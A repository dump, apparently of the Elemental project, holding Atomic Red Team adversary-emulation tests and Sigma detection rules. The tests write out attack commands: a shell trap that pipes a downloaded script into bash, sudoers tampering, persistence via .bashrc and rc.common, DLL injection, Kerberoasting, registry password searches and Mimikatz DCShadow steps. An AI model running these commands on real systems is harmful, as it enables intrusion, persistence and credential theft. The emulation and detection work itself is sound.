3 | display_name: Launchctl
4 |
5 | atomic_tests:
6 | - name: Launchctl
7 | description: |
8 | Utilize launchctl
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: sh
15 | command: |
16 | launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator
17 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1153.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1153
3 | display_name: Source
4 |
5 | atomic_tests:
6 | - name: Execute Script using Source
7 | description: |
8 | Creates a script and executes it using the source command
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
18 | chmod +x /tmp/art.sh
19 | source /tmp/art.sh
20 |
21 | - name: Execute Script using Source Alias
22 | description: |
23 | Creates a script and executes it using the source command's dot alias
24 |
25 | supported_platforms:
26 | - macos
27 | - linux
28 |
29 | executor:
30 | name: sh
31 | command: |
32 | sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
33 | chmod +x /tmp/art.sh
34 | . /tmp/art.sh
35 |
36 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1154.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1154
3 | display_name: Trap
4 |
5 | atomic_tests:
6 | - name: Trap
7 | description: |
8 | After exiting the shell, the script will download and execute.
9 |
10 | After sending a keyboard interrupt (CTRL+C) the script will download and execute.
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor:
19 | name: sh
20 | command: |
21 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
22 | exit
23 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1156.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1156
3 | display_name: .bash_profile and .bashrc
4 |
5 | atomic_tests:
6 | - name: Add command to .bash_profile
7 | description: |
8 | Adds a command to the .bash_profile file of the current user
9 | supported_platforms:
10 | - macos
11 | - linux
12 | input_arguments:
13 | command_to_add:
14 | description: Command to add to the .bash_profile file
15 | type: string
16 | default: /path/to/script.py
17 | executor:
18 | name: sh
19 | command: |
20 | echo "#{command_to_add}" >> ~/.bash_profile
21 |
22 | - name: Add command to .bashrc
23 | description: |
24 | Adds a command to the .bashrc file of the current user
25 | supported_platforms:
26 | - macos
27 | - linux
28 | input_arguments:
29 | command_to_add:
30 | description: Command to add to the .bashrc file
31 | type: string
32 | default: /path/to/script.py
33 | executor:
34 | name: sh
35 | command: |
36 | echo "#{command_to_add}" >> ~/.bashrc
37 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1160.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1160
3 | display_name: Launch Daemon
4 |
5 | atomic_tests:
6 | - name: Launch Daemon
7 | description: |
8 | Utilize LaunchDaemon to launch `Hello World`
9 |
10 | supported_platforms:
11 | - macos
12 |
13 |
14 | executor:
15 | name: manual
16 | steps: |
17 | 1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
18 | 2.
19 |
20 |
21 |
22 |
23 | Label
24 | com.example.hello
25 | ProgramArguments
26 |
27 | hello
28 | world
29 |
30 | KeepAlive
31 |
32 |
33 |
34 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1163.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1163
3 | display_name: rc.common
4 |
5 | atomic_tests:
6 | - name: rc.common
7 | description: |
8 | Modify rc.common
9 |
10 | [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html)
11 |
12 | supported_platforms:
13 | - macos
14 |
15 | executor:
16 | name: sh
17 | command: |
18 | echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common
19 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1169.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1169
3 | display_name: SUDO
4 |
5 | atomic_tests:
6 | - name: Sudo usage
7 | description: |
8 | Common Sudo enumeration methods.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sudo -l
18 | sudo su
19 | cat /etc/sudoers
20 | vim /etc/sudoers
21 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1179.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1179
3 | display_name: Hooking
4 |
5 | atomic_tests:
6 | - name: Hook PowerShell TLS Encrypt/Decrypt Messages
7 | description: |
8 | Hooks functions in PowerShell to read TLS Communications
9 | supported_platforms:
10 | - windows
11 | input_arguments:
12 | file_name:
13 | description: Dll To Inject
14 | type: Path
15 | default: C:\AtomicRedTeam\atomics\T1179\bin\T1179x64.dll
16 | server_name:
17 | description: TLS Server To Test Get Request
18 | type: Url
19 | default: https://www.example.com
20 | executor:
21 | name: powershell
22 | elevation_required: true
23 | command: |
24 | mavinject $pid /INJECTRUNNING #{file_name}
25 | curl #{server_name}
26 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1196.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1196
3 | display_name: Control Panel Items
4 |
5 | atomic_tests:
6 | - name: Control Panel Items
7 | description: |
8 | This test simulates an adversary leveraging control.exe to execute a payload and pops calc
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | cpl_file_path:
15 | description: path to cpl file
16 | type: path
17 | default: calc.cpl
18 |
19 | executor:
20 | name: command_prompt
21 | elevation_required: false
22 | command: |
23 | control.exe #{cpl_file_path}
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1206.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1206
3 | display_name: Sudo Caching
4 |
5 | atomic_tests:
6 | - name: Unlimited sudo cache timeout
7 | description: |
8 | Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | executor:
15 | name: sh
16 | command: |
17 | sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
18 | sudo visudo -c -f /etc/sudoers
19 |
20 | - name: Disable tty_tickets for sudo caching
21 | description: |
22 | Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.
23 |
24 | supported_platforms:
25 | - macos
26 | - linux
27 |
28 | executor:
29 | name: sh
30 | command: |
31 | sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
32 | sudo visudo -c -f /etc/sudoers
33 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1207.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1207
3 | display_name: DCShadow
4 |
5 | atomic_tests:
6 | - name: DCShadow - Mimikatz
7 | description: |
8 | Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
9 |
10 | [DCShadow](https://www.dcshadow.com/)
11 | [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
12 |
13 | supported_platforms:
14 | - windows
15 |
16 | executor:
17 | name: manual
18 | steps: |
19 | 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
20 | 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
21 | 3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
22 | 4. lsadump::dcshadow /push
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1208.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1208
3 | display_name: Kerberoasting
4 |
5 | atomic_tests:
6 | - name: Request for service tickets
7 | description: |
8 | This test uses the Powershell Empire Module: https://github.com/EmpireProject/Empire/blob/master/data/module_source/credentials/Invoke-Kerberoast.ps1
9 |
10 | The following are further sources and credits for this attack:
11 | [Kerberoasting Without Mimikatz source] (https://www.harmj0y.net/blog/powershell/kerberoasting-without-mimikatz/)
12 | [Invoke-Kerberoast source] (https://powersploit.readthedocs.io/en/latest/Recon/Invoke-Kerberoast/)
13 |
14 | supported_platforms:
15 | - windows
16 |
17 | executor:
18 | name: powershell
19 | elevation_required: false
20 | command: |
21 | Import-Module .\Invoke-Kerberoast.ps1
22 | Invoke-Kerberoast | fl
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1214.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1214
3 | display_name: Credentials in Registry
4 |
5 | atomic_tests:
6 | - name: Enumeration for Credentials in Registry
7 | description: |
8 | Queries to enumerate for credentials in the Registry.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | executor:
14 | name: command_prompt
15 | elevation_required: false
16 | command: |
17 | reg query HKLM /f password /t REG_SZ /s
18 | reg query HKCU /f password /t REG_SZ /s
19 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1496.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1496
3 | display_name: Resource Hijacking
4 |
5 | atomic_tests:
6 | - name: macOS/Linux - Simulate CPU Load with Yes
7 | description: |
8 | This test simulates a high CPU load as you might observe during cryptojacking attacks.
9 | End the test by using CTRL/CMD+C to break.
10 |
11 | supported_platforms:
12 | - macos
13 | - centos
14 | - ubuntu
15 | - linux
16 |
17 | executor:
18 | name: bash
19 | command: |
20 | yes > /dev/null
21 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1500.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1500
3 | display_name: Compile After Delivery
4 |
5 | atomic_tests:
6 | - name: Compile After Delivery using csc.exe
7 | description: |
8 | Compile C# code using csc.exe binary used by .NET
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_file:
15 | description: C# code that launches calc.exe from a hidden cmd.exe Window
16 | type: file
17 | default: $PathToAtomicsFolder\T1500\src\calc.cs
18 | output_file:
19 | description: Output compiled binary
20 | type: file
21 | default: C:\Windows\Temp\T1500.exe
22 |
23 | executor:
24 | name: command_prompt
25 | elevation_required: false
26 | command: |
27 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}
28 | cleanup_command: |
29 | del #{output_file}
--------------------------------------------------------------------------------
/elemental/media/atomics/T1518.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1518
3 | display_name: Software Discovery
4 |
5 | atomic_tests:
6 | - name: Find and Display Iinternet Explorer Browser Version
7 | description: |
8 | Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | executor:
14 | name: command_prompt
15 | elevation_required: false # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
16 | command: | # these are the actaul attack commands, at least one command must be provided
17 | reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
18 |
19 |
--------------------------------------------------------------------------------
/elemental/media/elemental.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/media/elemental.png
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_apt29_thinktanks.yml:
--------------------------------------------------------------------------------
1 | title: APT29
2 | id: 033fe7d6-66d1-4240-ac6b-28908009c71f
3 | description: This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks
4 | references:
5 | - https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/
6 | tags:
7 | - attack.execution
8 | - attack.g0016
9 | - attack.t1086
10 | author: Florian Roth
11 | date: 2018/12/04
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine: '*-noni -ep bypass $*'
18 | condition: selection
19 | falsepositives:
20 | - unknown
21 | level: critical
22 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_babyshark.yml:
--------------------------------------------------------------------------------
1 | title: Baby Shark Activity
2 | id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35
3 | status: experimental
4 | description: Detects activity that could be related to Baby Shark malware
5 | references:
6 | - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
7 | tags:
8 | - attack.execution
9 | - attack.t1059
10 | - attack.t1086
11 | - attack.discovery
12 | - attack.t1012
13 | - attack.defense_evasion
14 | - attack.t1170
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | author: Florian Roth
19 | date: 2019/02/24
20 | detection:
21 | selection:
22 | CommandLine:
23 | - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
24 | - powershell.exe mshta.exe http*
25 | - cmd.exe /c taskkill /im cmd.exe
26 | condition: selection
27 | falsepositives:
28 | - unknown
29 | level: high
30 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_bear_activity_gtr19.yml:
--------------------------------------------------------------------------------
1 | title: Judgement Panda Exfil Activity
2 | id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
3 | description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
4 | references:
5 | - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
6 | author: Florian Roth
7 | date: 2019/02/21
8 | tags:
9 | - attack.credential_access
10 | - attack.t1081
11 | - attack.t1003
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection1:
17 | Image: '*\xcopy.exe'
18 | CommandLine: '* /S /E /C /Q /H \\*'
19 | selection2:
20 | Image: '*\adexplorer.exe'
21 | CommandLine: '* -snapshot "" c:\users\\*'
22 | condition: selection1 or selection2
23 | falsepositives:
24 | - unknown
25 | level: critical
26 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_carbonpaper_turla.yml:
--------------------------------------------------------------------------------
1 | title: Turla Service Install
2 | id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4
3 | description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
4 | references:
5 | - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
6 | tags:
7 | - attack.persistence
8 | - attack.g0010
9 | - attack.t1050
10 | logsource:
11 | product: windows
12 | service: system
13 | detection:
14 | selection:
15 | EventID: 7045
16 | ServiceName:
17 | - 'srservice'
18 | - 'ipvpn'
19 | - 'hkmsvc'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_cloudhopper.yml:
--------------------------------------------------------------------------------
1 | title: WMIExec VBS Script
2 | id: 966e4016-627f-44f7-8341-f394905c361f
3 | description: Detects suspicious file execution by wscript and cscript
4 | author: Florian Roth
5 | references:
6 | - https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
7 | tags:
8 | - attack.execution
9 | - attack.g0045
10 | - attack.t1064
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | Image: '*\cscript.exe'
17 | CommandLine: '*.vbs /shell *'
18 | condition: selection
19 | fields:
20 | - CommandLine
21 | - ParentCommandLine
22 | falsepositives:
23 | - Unlikely
24 | level: critical
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_empiremonkey.yml:
--------------------------------------------------------------------------------
1 | action: global
2 | title: Empire Monkey
3 | id: 10152a7b-b566-438f-a33c-390b607d1c8d
4 | description: Detects EmpireMonkey APT reported Activity
5 | references:
6 | - https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b
7 | tags:
8 | - attack.t1086
9 | - attack.execution
10 | date: 2019/04/02
11 | author: Markus Neis
12 | detection:
13 | condition: 1 of them
14 | falsepositives:
15 | - Very Unlikely
16 | level: critical
17 | ---
18 | logsource:
19 | category: process_creation
20 | product: windows
21 | detection:
22 | selection_cutil:
23 | CommandLine:
24 | - '*/i:%APPDATA%\logs.txt scrobj.dll'
25 | Image:
26 | - '*\cutil.exe'
27 | selection_regsvr32:
28 | CommandLine:
29 | - '*/i:%APPDATA%\logs.txt scrobj.dll'
30 | Description:
31 | - Microsoft(C) Registerserver
32 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_equationgroup_dll_u_load.yml:
--------------------------------------------------------------------------------
1 | title: Equation Group DLL_U Load
2 | id: d465d1d8-27a2-4cca-9621-a800f37cf72e
3 | author: Florian Roth
4 | description: Detects a specific tool and export used by EquationGroup
5 | references:
6 | - https://github.com/adamcaudill/EquationGroupLeak/search?utf8=%E2%9C%93&q=dll_u&type=
7 | - https://securelist.com/apt-slingshot/84312/
8 | - https://twitter.com/cyb3rops/status/972186477512839170
9 | tags:
10 | - attack.execution
11 | - attack.g0020
12 | - attack.t1059
13 | - attack.defense_evasion
14 | - attack.t1085
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection1:
20 | Image: '*\rundll32.exe'
21 | CommandLine: '*,dll_u'
22 | selection2:
23 | CommandLine: '* -export dll_u *'
24 | condition: 1 of them
25 | falsepositives:
26 | - Unknown
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_hurricane_panda.yml:
--------------------------------------------------------------------------------
1 | title: Hurricane Panda Activity
2 | id: 0eb2107b-a596-422e-b123-b389d5594ed7
3 | author: Florian Roth
4 | status: experimental
5 | description: Detects Hurricane Panda Activity
6 | references:
7 | - https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
8 | tags:
9 | - attack.privilege_escalation
10 | - attack.g0009
11 | - attack.t1068
12 | logsource:
13 | category: process_creation
14 | product: windows
15 | detection:
16 | selection:
17 | CommandLine:
18 | - '* localgroup administrators admin /add'
19 | - '*\Win64.exe*'
20 | condition: selection
21 | falsepositives:
22 | - Unknown
23 | level: high
24 |
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_slingshot.yml:
--------------------------------------------------------------------------------
1 | action: global
2 | title: Defrag Deactivation
3 | id: 958d81aa-8566-4cea-a565-59ccd4df27b0
4 | author: Florian Roth
5 | description: Detects the deactivation of the Scheduled defragmentation task as seen by Slingshot APT group
6 | references:
7 | - https://securelist.com/apt-slingshot/84312/
8 | tags:
9 | - attack.persistence
10 | - attack.t1053
11 | - attack.s0111
12 | detection:
13 | condition: 1 of them
14 | falsepositives:
15 | - Unknown
16 | level: medium
17 | ---
18 | logsource:
19 | category: process_creation
20 | product: windows
21 | detection:
22 | selection1:
23 | CommandLine:
24 | - '*schtasks* /delete *Defrag\ScheduledDefrag*'
25 | ---
26 | logsource:
27 | product: windows
28 | service: security
29 | definition: 'Requirements: Audit Policy : Audit Other Object Access Events > Success'
30 | detection:
31 | selection2:
32 | EventID: 4701
33 | TaskName: '\Microsoft\Windows\Defrag\ScheduledDefrag'
34 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_sofacy.yml:
--------------------------------------------------------------------------------
1 | title: Sofacy Trojan Loader Activity
2 | id: ba778144-5e3d-40cf-8af9-e28fb1df1e20
3 | author: Florian Roth
4 | status: experimental
5 | description: Detects Trojan loader acitivty as used by APT28
6 | references:
7 | - https://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/
8 | - https://www.reverse.it/sample/e3399d4802f9e6d6d539e3ae57e7ea9a54610a7c4155a6541df8e94d67af086e?environmentId=100
9 | - https://twitter.com/ClearskySec/status/960924755355369472
10 | tags:
11 | - attack.g0007
12 | - attack.execution
13 | - attack.t1059
14 | - attack.defense_evasion
15 | - attack.t1085
16 | - car.2013-10-002
17 | logsource:
18 | category: process_creation
19 | product: windows
20 | detection:
21 | selection:
22 | CommandLine:
23 | - 'rundll32.exe %APPDATA%\\*.dat",*'
24 | - 'rundll32.exe %APPDATA%\\*.dll",#1'
25 | condition: selection
26 | falsepositives:
27 | - Unknown
28 | level: critical
29 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_stonedrill.yml:
--------------------------------------------------------------------------------
1 | title: StoneDrill Service Install
2 | id: 9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6
3 | description: This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky
4 | author: Florian Roth
5 | references:
6 | - https://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/
7 | tags:
8 | - attack.persistence
9 | - attack.g0064
10 | - attack.t1050
11 | logsource:
12 | product: windows
13 | service: system
14 | detection:
15 | selection:
16 | EventID: 7045
17 | ServiceName: NtsSrv
18 | ServiceFileName: '* LocalService'
19 | condition: selection
20 | falsepositives:
21 | - Unlikely
22 | level: high
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_ta17_293a_ps.yml:
--------------------------------------------------------------------------------
1 | title: Ps.exe Renamed SysInternals Tool
2 | id: 18da1007-3f26-470f-875d-f77faf1cab31
3 | description: Detects renamed SysInternals tool execution with a binary named ps.exe as used by Dragonfly APT group and documented in TA17-293A report
4 | references:
5 | - https://www.us-cert.gov/ncas/alerts/TA17-293A
6 | tags:
7 | - attack.defense_evasion
8 | - attack.g0035
9 | - attack.t1036
10 | - car.2013-05-009
11 | author: Florian Roth
12 | date: 2017/10/22
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | CommandLine: 'ps.exe -accepteula'
19 | condition: selection
20 | falsepositives:
21 | - Renamed SysInternals tool
22 | level: high
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_tropictrooper.yml:
--------------------------------------------------------------------------------
1 | title: TropicTrooper Campaign November 2018
2 | id: 8c7090c3-e0a0-4944-bd08-08c3a0cecf79
3 | author: '@41thexplorer, Windows Defender ATP'
4 | status: stable
5 | description: Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia
6 | references:
7 | - https://cloudblogs.microsoft.com/microsoftsecure/2018/11/28/windows-defender-atp-device-risk-score-exposes-new-cyberattack-drives-conditional-access-to-protect-networks/
8 | tags:
9 | - attack.execution
10 | - attack.t1085
11 | logsource:
12 | category: process_creation
13 | product: windows
14 | detection:
15 | selection:
16 | CommandLine: '*abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc*'
17 | condition: selection
18 | level: high
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_turla_service_png.yml:
--------------------------------------------------------------------------------
1 | title: Turla PNG Dropper Service
2 | id: 1228f8e2-7e79-4dea-b0ad-c91f1d5016c1
3 | description: This method detects malicious services mentioned in Turla PNG dropper report by NCC Group in November 2018
4 | references:
5 | - https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/
6 | author: Florian Roth
7 | date: 2018/11/23
8 | tags:
9 | - attack.persistence
10 | - attack.g0010
11 | - attack.t1050
12 | logsource:
13 | product: windows
14 | service: system
15 | detection:
16 | selection:
17 | EventID: 7045
18 | ServiceName: 'WerFaultSvc'
19 | condition: selection
20 | falsepositives:
21 | - unlikely
22 | level: critical
23 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/apt_zxshell.yml:
--------------------------------------------------------------------------------
1 | title: ZxShell Malware
2 | id: f0b70adb-0075-43b0-9745-e82a1c608fcc
3 | description: Detects a ZxShell start by the called and well-known function name
4 | author: Florian Roth
5 | references:
6 | - https://www.hybrid-analysis.com/sample/5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16?environmentId=100
7 | tags:
8 | - attack.g0001
9 | - attack.execution
10 | - attack.t1059
11 | - attack.defense_evasion
12 | - attack.t1085
13 | logsource:
14 | category: process_creation
15 | product: windows
16 | detection:
17 | selection:
18 | Command:
19 | - 'rundll32.exe *,zxFunction*'
20 | - 'rundll32.exe *,RemoteDiskXXXXX'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | falsepositives:
26 | - Unlikely
27 | level: critical
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/av_password_dumper.yml:
--------------------------------------------------------------------------------
1 | title: Antivirus Password Dumper Detection
2 | id: 78cc2dd2-7d20-4d32-93ff-057084c38b93
3 | description: Detects a highly relevant Antivirus alert that reports a password dumper
4 | date: 2018/09/09
5 | modified: 2019/10/04
6 | author: Florian Roth
7 | references:
8 | - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
9 | tags:
10 | - attack.credential_access
11 | - attack.t1003
12 | logsource:
13 | product: antivirus
14 | detection:
15 | selection:
16 | Signature:
17 | - "*DumpCreds*"
18 | - "*Mimikatz*"
19 | - "*PWCrack*"
20 | - "HTool/WCE"
21 | - "*PSWtool*"
22 | - "*PWDump*"
23 | - "*SecurityTool*"
24 | - "*PShlSpy*"
25 | condition: selection
26 | fields:
27 | - FileName
28 | - User
29 | falsepositives:
30 | - Unlikely
31 | level: critical
32 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/av_webshell.yml:
--------------------------------------------------------------------------------
1 | title: Antivirus Web Shell Detection
2 | id: fdf135a2-9241-4f96-a114-bb404948f736
3 | description: Detects a highly relevant Antivirus alert that reports a web shell
4 | date: 2018/09/09
5 | modified: 2019/10/04
6 | author: Florian Roth
7 | references:
8 | - https://www.nextron-systems.com/2018/09/08/antivirus-event-analysis-cheat-sheet-v1-4/
9 | tags:
10 | - attack.persistence
11 | - attack.t1100
12 | logsource:
13 | product: antivirus
14 | detection:
15 | selection:
16 | Signature:
17 | - "PHP/Backdoor*"
18 | - "JSP/Backdoor*"
19 | - "ASP/Backdoor*"
20 | - "Backdoor.PHP*"
21 | - "Backdoor.JSP*"
22 | - "Backdoor.ASP*"
23 | - "*Webshell*"
24 | condition: selection
25 | fields:
26 | - FileName
27 | - User
28 | falsepositives:
29 | - Unlikely
30 | level: critical
31 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/crime_fireball.yml:
--------------------------------------------------------------------------------
1 | title: Fireball Archer Install
2 | id: 3d4aebe0-6d29-45b2-a8a4-3dfde586a26d
3 | status: experimental
4 | description: Detects Archer malware invocation via rundll32
5 | author: Florian Roth
6 | date: 2017/06/03
7 | references:
8 | - https://www.virustotal.com/en/file/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022/analysis/
9 | - https://www.hybrid-analysis.com/sample/9b4971349ae85aa09c0a69852ed3e626c954954a3927b3d1b6646f139b930022?environmentId=100
10 | tags:
11 | - attack.execution
12 | - attack.t1059
13 | - attack.defense_evasion
14 | - attack.t1085
15 | logsource:
16 | category: process_creation
17 | product: windows
18 | detection:
19 | selection:
20 | CommandLine: '*\rundll32.exe *,InstallArcherSvc'
21 | condition: selection
22 | fields:
23 | - CommandLine
24 | - ParentCommandLine
25 | falsepositives:
26 | - Unknown
27 | level: high
28 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_auditd_masquerading_crond.yml:
--------------------------------------------------------------------------------
1 | title: Masquerading as Linux crond process
2 | id: 9d4548fa-bba0-4e88-bd66-5d5bf516cda0
3 | status: experimental
4 | description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and
5 | observation. Several different variations of this technique have been observed.
6 | author: Timur Zinniatullin, oscd.community
7 | date: 2019/10/21
8 | references:
9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.yaml
10 | logsource:
11 | product: linux
12 | service: auditd
13 | detection:
14 | selection:
15 | type: 'execve'
16 | a0: 'cp'
17 | a1: '-i'
18 | a2: '/bin/sh'
19 | a3: '*/crond'
20 | condition: selection
21 | level: medium
22 | tags:
23 | - attack.defense_evasion
24 | - attack.t1036
25 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_auditd_user_discovery.yml:
--------------------------------------------------------------------------------
1 | title: System Owner or User Discovery
2 | id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3
3 | status: experimental
4 | description: Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not
5 | the adversary fully infects the target and/or attempts specific actions.
6 | author: Timur Zinniatullin, oscd.community
7 | date: 2019/10/21
8 | references:
9 | - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.yaml
10 | logsource:
11 | product: linux
12 | service: auditd
13 | detection:
14 | selection:
15 | type: 'EXECVE'
16 | a0:
17 | - 'users'
18 | - 'w'
19 | - 'who'
20 | condition: selection
21 | falsepositives:
22 | - Admin activity
23 | level: low
24 | tags:
25 | - attack.discovery
26 | - attack.t1033
27 |
--------------------------------------------------------------------------------
/elemental/media/sigma_rules/lnx_auditd_web_rce.yml:
--------------------------------------------------------------------------------
1 | title: Webshell Remote Command Execution
2 | id: c0d3734d-330f-4a03-aae2-65dacc6a8222
3 | status: experimental
4 | description: Detects posible command execution by web application/web shell
5 | tags:
6 | - attack.persistence
7 | - attack.t1100
8 | references:
9 | - personal experience
10 | author: Ilyas Ochkov, Beyu Denis, oscd.community
11 | date: 2019/10/12
12 | modified: 2019/11/04
13 | logsource:
14 | product: linux
15 | service: auditd
16 | detection:
17 | selection:
18 | type: 'SYSCALL'
19 | SYSCALL: 'execve'
20 | key: 'detect_execve_www'
